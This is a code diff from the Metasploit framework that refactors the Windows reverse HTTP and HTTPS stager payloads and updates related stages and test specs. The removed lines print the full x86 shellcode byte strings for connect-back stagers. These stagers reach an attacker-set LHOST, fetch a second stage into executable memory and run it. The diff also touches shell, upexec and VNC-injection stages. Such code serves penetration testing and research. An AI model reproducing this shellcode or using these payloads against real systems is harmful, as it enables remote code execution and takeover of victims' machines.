require 'msf/core/handler/reverse_http'
require 'msf/core/payload/windows/reverse_http'
module Metasploit3
CachedSize = 322
CachedSize = 306
include Msf::Payload::Stager
include Msf::Payload::Windows
include Msf::Payload::Windows::ReverseHttp
def initialize(info = {})
super(merge_info(info,
@ -24,68 +25,6 @@ module Metasploit3
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseHttp,
'Convention' => 'sockedi http',
'Stager' =>
{
'Offsets' =>
{
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 240, 'V' ],
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
},
'Payload' =>
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
"\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" +
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" +
"\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" +
"\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
"\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
"\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" +
"\xFF\xFF"
}
))
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
lhost = datastore['LHOST'] || '127.127.127.127'
if Rex::Socket.is_ipv6?(lhost)
lhost = "[#{lhost}]"
end
p + lhost + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
'Convention' => 'sockedi http'))
end
end

63
modules/payloads/stagers/windows/reverse_https.rb
View File

@ -6,14 +6,16 @@
require 'msf/core'
require 'msf/core/handler/reverse_https'
require 'msf/core/payload/windows/reverse_https'
module Metasploit3
CachedSize = 327
CachedSize = 326
include Msf::Payload::Stager
include Msf::Payload::Windows
include Msf::Payload::Windows::ReverseHttps
def initialize(info = {})
super(merge_info(info,
@ -24,64 +26,7 @@ module Metasploit3
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseHttps,
'Convention' => 'sockedi https',
'Stager' =>
{
'Offsets' =>
{
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 260, 'V' ],
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
},
'Payload' =>
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
"\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" +
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" +
"\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
"\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" +
"\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" +
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" +
"\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" +
"\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" +
"\x5F\xE8\x7B\xFF\xFF\xFF"
}
))
'Convention' => 'sockedi https'))
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#
def stage_over_connection?
false
end
#
# Generate the first stage
#
def generate
p = super
i = p.index("/12345\x00")
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
p + datastore['LHOST'].to_s + "\x00"
end
#
# Always wait at least 20 seconds for this payload (due to staging delays)
#
def wfs_delay
20
end
end

2
modules/payloads/stagers/windows/x64/reverse_https.rb
View File

@ -6,7 +6,7 @@
require 'msf/core'
require 'msf/core/handler/reverse_https'
#require 'msf/core/payload/windows/x64/reverse_https'
module Metasploit3

2
modules/payloads/stages/windows/shell.rb
View File

@ -23,7 +23,7 @@ module Metasploit3
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'sockedi -https'
'Convention' => 'sockedi -http -https'
},
'Stage' =>
{

2
modules/payloads/stages/windows/upexec.rb
View File

@ -23,7 +23,7 @@ module Metasploit3
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'sockedi -https'
'Convention' => 'sockedi -http -https'
},
'Stage' =>
{

3
modules/payloads/stages/windows/vncinject.rb
View File

@ -25,7 +25,8 @@ module Metasploit3
'Name' => 'VNC Server (Reflective Injection)',
'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject ))
'Session' => Msf::Sessions::VncInject,
'Convention' => 'sockedi -http -https'))
end

2
modules/payloads/stages/windows/x64/shell.rb
View File

@ -23,7 +23,7 @@ module Metasploit3
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'sockrdi'
'Convention' => 'sockrdi -http -https'
},
'Stage' =>
{

13
spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb
View File

@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
subject(:dummy_object) { DummyClass.new }
it { should respond_to :generate_uri_checksum}
it { should respond_to :generate_uri_checksum_with_length}
it { should respond_to :process_uri_resource}
describe '#generate_uri_checksum' do
@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
end
end
describe '#generate_uri_checksum_with_length' do
[0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value|
[5,30,50,100,127].each do |uri_length|
it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do
uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length)
expect(Rex::Text.checksum8(uri_string)).to eq checksum_value
end
end
end
end
describe '#process_uri_resource' do
context 'when passed a value for INITW' do
let(:uri) { "/7E37v"}

121
spec/modules/payloads_spec.rb
View File

@ -2991,39 +2991,6 @@ describe 'modules/payloads', :content do
reference_name: 'windows/shell/find_tag'
end
context 'windows/shell/reverse_hop_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_hop_http',
'stages/windows/shell'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/reverse_hop_http'
end
context 'windows/shell/reverse_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http',
'stages/windows/shell'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/reverse_http'
end
context 'windows/shell/reverse_http_proxy_pstore' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http_proxy_pstore',
'stages/windows/shell'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/reverse_http_proxy_pstore'
end
context 'windows/shell/reverse_ipv6_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3217,39 +3184,6 @@ describe 'modules/payloads', :content do
reference_name: 'windows/upexec/find_tag'
end
context 'windows/upexec/reverse_hop_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_hop_http',
'stages/windows/upexec'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/reverse_hop_http'
end
context 'windows/upexec/reverse_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http',
'stages/windows/upexec'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/reverse_http'
end
context 'windows/upexec/reverse_http_proxy_pstore' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http_proxy_pstore',
'stages/windows/upexec'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/reverse_http_proxy_pstore'
end
context 'windows/upexec/reverse_ipv6_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3393,39 +3327,6 @@ describe 'modules/payloads', :content do
reference_name: 'windows/vncinject/find_tag'
end
context 'windows/vncinject/reverse_hop_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_hop_http',
'stages/windows/vncinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/reverse_hop_http'
end
context 'windows/vncinject/reverse_http' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http',
'stages/windows/vncinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/reverse_http'
end
context 'windows/vncinject/reverse_http_proxy_pstore' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/reverse_http_proxy_pstore',
'stages/windows/vncinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/reverse_http_proxy_pstore'
end
context 'windows/vncinject/reverse_ipv6_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3578,17 +3479,6 @@ describe 'modules/payloads', :content do
reference_name: 'windows/x64/shell/bind_tcp'
end
context 'windows/x64/shell/reverse_https' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/x64/reverse_https',
'stages/windows/x64/shell'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/shell/reverse_https'
end
context 'windows/x64/shell/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
@ -3631,17 +3521,6 @@ describe 'modules/payloads', :content do
reference_name: 'windows/x64/vncinject/bind_tcp'
end
context 'windows/x64/vncinject/reverse_https' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [
'stagers/windows/x64/reverse_https',
'stages/windows/x64/vncinject'
],
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/vncinject/reverse_https'
end
context 'windows/x64/vncinject/reverse_tcp' do
it_should_behave_like 'payload cached size is consistent',
ancestor_reference_names: [